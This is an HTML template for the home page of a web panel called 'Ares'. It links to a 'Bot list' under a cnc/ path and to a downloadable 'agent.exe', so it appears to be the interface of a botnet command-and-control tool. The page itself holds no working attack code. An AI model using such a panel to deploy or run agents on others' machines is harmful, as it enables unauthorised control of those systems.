<!DOCTYPE html>
<html>
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="chrome=1">

    <link rel="stylesheet" type="text/css" href="static/css/stylesheet.css" media="screen">
    <link rel="stylesheet" type="text/css" href="static/css/github-dark.css" media="screen">
    <title>Ares</title>
  </head>

  <body>
    <header>
      <div class="container">
        <h1>Ares</h1>
        <h2 style="text-align: right"><a href="./passchange">Change Password</a>  <a href="./disconnect">Disconnect</a></h2>
       </div>
    </header>
    <div class="container">
    	<section id="main_content">

  		<p>Welcome to Ares.</p>
  		<ul>
  		<li><a href="cnc/">Bot list</a></li>
  		<li><a href="static/agent.exe">Download agent</a></li>
  		</ul>
    	
	    </section>
    </div>
  </body>
</html>
